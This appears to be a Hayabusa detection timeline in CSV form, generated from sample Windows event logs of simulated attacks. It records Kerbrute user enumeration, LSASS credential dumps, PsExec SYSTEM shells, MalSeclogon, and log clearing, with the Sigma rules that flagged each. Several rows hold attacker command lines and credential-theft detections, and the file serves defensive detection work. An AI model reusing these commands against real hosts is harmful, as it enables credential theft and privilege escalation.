-,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.031 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_6aaeeb113c0c4af3a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.035 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_2f6964c8f421408ab | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.047 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_374806bcc65140a5a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.052 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_b2a35e76f50a4c23a | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:07.056 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: SM_957258b5879242afb | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:11.514 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hack1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:11.878 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: hacker2 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-03 12:06:12.553 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dsrm | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos user enumeration (Kerbrute).evtx +2021-12-04 20:59:31.403 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x13a4 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Task Manager access indicator for potential LSASS dump.evtx +2021-12-04 21:10:40.723 +00:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Users\admmig\AppData\Local\Temp\lsass (4).DMP | Process: C:\Windows\System32\Taskmgr.exe | PID: 3504 | PGUID: A57649D1-D6B1-61AB-A5E4-D70100000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx +2021-12-04 21:10:40.723 +00:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx +2021-12-04 21:10:40.723 +00:00,fs03vuln.offsec.lan,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/file_event_win_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-LSASS credentials dump via Task Manager.evtx +2021-12-04 21:19:16.741 +00:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | Cmd: PsExec64.exe -i -s cmd | Process: C:\TOOLS\PsExec64.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x83ef56 | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000 | Hash: SHA1=FB0A150601470195C47B4E8D87FCB3F50292BEB2,MD5=9321C107D1F7E336CDA550A2BF049108,SHA256=AD6B98C01EE849874E4B4502C3D7853196F6044240D3271E4AB3FC6E3C08E9A4,IMPHASH=159D56D406180A332FBC99290F30700E",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.757 +00:00,fs03vuln.offsec.lan,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.757 +00:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1035,technique_name=Service Execution | SetValue: HKU\S-1-5-21-4230534742-2542757381-3142984815-1111\Software\Sysinternals\PsExec\EulaAccepted: DWORD (0x00000001) | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.757 +00:00,fs03vuln.offsec.lan,11,low,Exec,PsExec Tool Execution,,rules/sigma/file_event/file_event_win_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.757 +00:00,fs03vuln.offsec.lan,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.804 +00:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.804 +00:00,fs03vuln.offsec.lan,17,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.913 +00:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC | Process: System | PID: 4 | PGUID: A57649D1-92D1-61A4-EB03-000000000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.913 +00:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.913 +00:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.913 +00:00,fs03vuln.offsec.lan,17,medium,,Pipe Created_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\Windows\PSEXESVC.exe | PID: 4752 | PGUID: A57649D1-DB54-61AB-2B62-DC0100000000",rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.913 +00:00,fs03vuln.offsec.lan,18,low,Exec,PsExec Tool Execution,,rules/sigma/pipe_created/pipe_created_tool_psexec.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.929 +00:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 540 | PGUID: A57649D1-DB54-61AB-0467-DC0100000000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.929 +00:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdin | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.929 +00:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stdout | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:16.929 +00:00,fs03vuln.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1077,technique_name=Windows Admin Shares | Pipe: \PSEXESVC-FS03VULN-2124-stderr | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 21:19:17.757 +00:00,fs03vuln.offsec.lan,22,info,,DNS Query,Query: fs03vuln | Result: 10.23.42.38; | Process: C:\TOOLS\PsExec64.exe | PID: 2124 | PGUID: A57649D1-DB54-61AB-775C-DC0100000000,rules/hayabusa/sysmon/events/22_DNS-Query.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID11,13,17,18-PSexec as system execution.evtx" +2021-12-04 22:09:13.666 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-04 22:09:13.671 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f26,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-04 22:09:13.672 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f3e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-04 22:09:13.673 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x10e6e8f54,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-04 22:09:18.652 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x10e6e929b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4724-5145-password reset with setNTLM (Mimikatz).evtx +2021-12-07 14:54:22.071 +00:00,fs03vuln.offsec.lan,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-User enumeration via command.evtx +2021-12-07 14:54:22.071 +00:00,fs03vuln.offsec.lan,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-User enumeration via command.evtx +2021-12-07 14:54:22.071 +00:00,fs03vuln.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-User enumeration via command.evtx +2021-12-07 14:54:22.071 +00:00,fs03vuln.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-User enumeration via command.evtx +2021-12-07 14:54:25.699 +00:00,fs03vuln.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-User enumeration via command.evtx +2021-12-07 14:54:25.699 +00:00,fs03vuln.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4688-User enumeration via command.evtx +2021-12-07 17:33:01.409 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: MalSeclogon.exe -p 636 -d 2 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x53ca2 | PID: 8612 | PGUID: 747F3D96-9ACD-61AF-D301-000000000102",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.474 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: - | LID: 0x3e7 | PID: 7108 | PGUID: 747F3D96-9ACD-61AF-D401-000000000102,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.485 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: NT AUTHORITY\NETWORK SERVICE | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x100000 | Src PID: 884 | Src PGUID: 747F3D96-0BA4-61B0-1200-000000000102 | Tgt PID: 7108 | Tgt PGUID: 747F3D96-9ACD-61AF-D401-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.616 +00:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x16e3db3 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.616 +00:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.616 +00:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.636 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: MalSeclogon.exe -p 636 -d 2 -l 1 | Process: \\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: - | LID: 0x16e3db3 | PID: 6072 | PGUID: 747F3D96-9ACD-61AF-D501-000000000102,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.638 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: MSEDGEWIN10\IEUser | Access: 0x100000 | Src PID: 8612 | Src PGUID: 747F3D96-9ACD-61AF-D301-000000000102 | Tgt PID: 6072 | Tgt PGUID: 747F3D96-9ACD-61AF-D501-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.680 +00:00,MSEDGEWIN10,4688,critical,CredAccess,Suspicious LSASS Process Clone,,rules/sigma/process_creation_builtin/proc_creation_win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.680 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: Z:\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: MSEDGEWIN10\IEUser | Tgt User: NT AUTHORITY\SYSTEM | Access: 0x1410 | Src PID: 6072 | Src PGUID: 747F3D96-9ACD-61AF-D501-000000000102 | Tgt PID: 5268 | Tgt PGUID: 747F3D96-9ACD-61AF-D701-000000000102,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.680 +00:00,MSEDGEWIN10,10,medium,CredAccess,Rare GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/proc_access_win_rare_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-07 17:33:01.680 +00:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/tutto_malseclogon.evtx +2021-12-09 13:41:50.714 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4624-RottenPotatoNG.evtx" +2021-12-09 13:41:51.740 +00:00,fs03vuln.offsec.lan,4688,critical,Exec,SMB Relay Attack Tools,,rules/sigma/process_creation_builtin/proc_creation_win_tools_relay_attacks.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4624-RottenPotatoNG.evtx" +2021-12-09 18:50:47.980 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.333 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4d5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d4fe,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d51f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2d532,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d4fe,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d51f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.349 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.958 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" 